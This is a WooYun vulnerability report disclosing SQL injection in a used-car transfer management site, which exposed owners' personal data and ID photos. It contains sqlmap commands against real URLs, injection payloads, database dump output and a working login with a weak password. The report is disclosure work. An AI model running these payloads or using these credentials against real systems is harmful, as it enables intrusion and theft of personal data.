当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151544

漏洞标题:优信二手车过户管理系统SQL注入(泄露大量车主信息及身份证正反面照片)

相关厂商:xin.com

漏洞作者: hecate

提交时间:2015-11-03 17:05

修复时间:2015-12-19 17:52

公开时间:2015-12-19 17:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-03: 细节已通知厂商并且等待厂商处理中
2015-11-04: 厂商已经确认,细节仅向厂商公开
2015-11-14: 细节向核心白帽子及相关领域专家公开
2015-11-24: 细节向普通白帽子公开
2015-12-04: 细节向实习白帽子公开
2015-12-19: 细节向公众公开

简要描述:

大量车主信息(姓名/手机/车牌号/合同/身份证正反面照片)

详细说明:

地址 http://wbgh.youxinpai.com/login/
与前面提交的http://wooyun.org/bugs/wooyun-2010-0149556 目测使用的同一套程序

sqlmap -u "http://wbgh.youxinpai.com/login/check/" --data "username=&password=m"


---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: username=-1231' OR 8092=8092#&password=m
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: username=-6771' OR 1 GROUP BY CONCAT(0x7178767a71,(SELECT (CASE WHEN (3647=3647) THEN 1 ELSE 0 END)),0x71717a6b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#&password=m
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: username=' AND (SELECT * FROM (SELECT(SLEEP(5)))hVQi)#&password=m
---
[15:55:31] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.14
back-end DBMS: MySQL 5.0.12


获取数据库

current user:   'wbgh_wr@172.16.100.%'
available databases [4]:
[*] AuditDB
[*] information_schema
[*] test
[*] wbgh
Database: wbgh
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| credit_youfen_consume_category | 95080   |
| credit_youfen_consume          | 65559   |
| credit_youfen_credittrade      | 32144   |
| credit_youfen_consume_city     | 29079   |
| credit                         | 18627   |
| credit_result                  | 17279   |
| credit_youfen                  | 7238    |
| credit_zhongzhicheng           | 5550    |
| transfer_op                    | 5449    |
| transfer_img                   | 3868    |
| credit_digcredit               | 3578    |
| transfer_log                   | 1667    |
| transfer                       | 1167    |
| transfer_extend                | 816     |
| bg_back                        | 647     |
| area_city                      | 509     |
| jr_information                 | 457     |
| picc_back                      | 244     |
| rbac_masterrole                | 146     |
| rbac_master                    | 97      |
| rbac_actionrole                | 87      |
| rbac_action                    | 52      |
| rbac_log                       | 33      |
| area_province                  | 31      |
| area_opencity                  | 7       |
| area_bigarea                   | 4       |
| rbac_role                      | 4       |
| zh_confim                      | 1       |
+--------------------------------+---------+


密码都是弱口令,解密后为6个0

11.png


随便登录一个 用户名 jinanwb 密码 000000
登录后也存在SQL注入

sqlmap -u "http://wbgh.youxinpai.com/management/car_admit/?opt=search&showstatus=&old_car_no=&car_type=&buyse_order_id=&buyer_phone=&time_type=share&ftime=&etime=&select=%E6%9F%A5%E8%AF%A2" --cookie="你的cookie"
参数 car_type可注入


Screenshot - 2015年11月03日 - 16时57分37秒.png


大量合同 

22.png


大量订单

33.png


订单详情

66.png


高清身份证照片

77.png

漏洞证明:

如上

修复方案:

多给点Rank

版权声明:转载请注明来源 hecate@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-11-04 17:50

厂商回复:

非常感谢您的关注和反馈!

最新状态:

暂无